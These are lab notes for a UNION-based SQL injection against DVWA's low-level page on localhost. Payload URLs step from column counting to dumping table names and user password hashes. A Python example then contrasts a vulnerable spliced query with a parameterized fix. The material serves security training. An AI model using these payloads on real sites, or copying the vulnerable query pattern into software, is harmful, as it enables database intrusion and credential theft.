SQL injection (string type) - low level - notes - SQL injection - DVWA lab
SQL Injection - low level - string type
1. Determine the number of columns in the SQL statement (method one)
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=3' order by 2--+&Submit=Submit#
#--> correct
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=3' order by 3--+&Submit=Submit#
#--> wrong
#--> In this SQL statement, the number of queried columns is 2.
2. Determine the number of columns in the SQL statement (method two)
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select 1,2 --+&Submit=Submit#
#--> correct
#--> First name: 1
#--> Surname: 2
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select 1,2,3 --+&Submit=Submit#
#--> The used SELECT statements have a different number of columns
#--> So the number of queried columns is 2.
#--> This union statement also shows which output positions the injected values land in.
3. Find the injection points
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select 1,2 --+&Submit=Submit#
#--> First name: 1
#--> Surname: 2
#--> The injection points are found: the two selected values appear in the First name and Surname fields.
4. Dump the database name and version
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select database(),version() --+&Submit=Submit#
#--> First name: dvwa
#--> Surname: 8.0.12
5. Dump the table names in the dvwa database
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select group_concat(distinct table_name),version() from information_schema.tables where table_schema=database()--+&Submit=Submit#
#--> First name: guestbook,users
#--> Surname: 8.0.12
6. Dump the column names of the users table
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select group_concat(distinct column_name),version() from information_schema.columns where table_schema=database() and table_name='users'--+&Submit=Submit#
#--> First name: avatar,failed_login,first_name,last_login,last_name,password,user,user_id
#--> Surname: 8.0.12
7. Dump the values of the user and password columns in the users table
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select group_concat(user,'-->',password),version() from users --+&Submit=Submit#
#--> First name: admin-->5f4dcc3b5aa765d61d8327deb882cf99,gordonb-->e99a18c428cb38d5f260853678922e03,1337-->8d3533d75ae2c3966d7e0d4fcc69216b,pablo-->0d107d09f5bbe40cade3de5c71e9e9b7,smithy-->5f4dcc3b5aa765d61d8327deb882cf99
#--> Surname: 8.0.12
Usernames and password hashes obtained; done.
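Why the low level is injectable, and what the fix looks like, as an added example that is not part of the original notes or of DVWA's own code: DVWA is PHP on MySQL, and this is a Python/SQLite stand-in (an assumption) with a constructed users table. The vulnerable function splices the id parameter into the query text the way the low level does; the hardened one validates the type and binds the value as a parameter. The step 2 column probe from the notes is fed to both.

```python
import sqlite3

# Constructed sample rows in the shape of DVWA's users table (the two hashes are
# the ones shown in step 7 of the notes; the remaining fields are made up here).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL dvwa.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Low-level pattern: the id parameter is spliced into the SQL text, so a
    quote inside it closes the string literal and the rest is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: check the type, then bind the value as a parameter.
    Whatever the string contains, it is compared as data, never parsed as SQL."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []  # reject non-numeric ids instead of passing them to the DB
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (uid,)).fetchall()


# Step 2 of the notes after URL decoding: '--+' becomes '-- ' (comment to end of line).
COLUMN_PROBE = "-3' union select 1,2 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, COLUMN_PROBE))  # [(1, 2)]
    print("safe:      ", lookup_safe(db, COLUMN_PROBE))        # []
```

In the vulnerable path the probe returns the row (1, 2), which is exactly the "First name: 1 / Surname: 2" echo the notes rely on; in the hardened path the same input never reaches the SQL parser.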
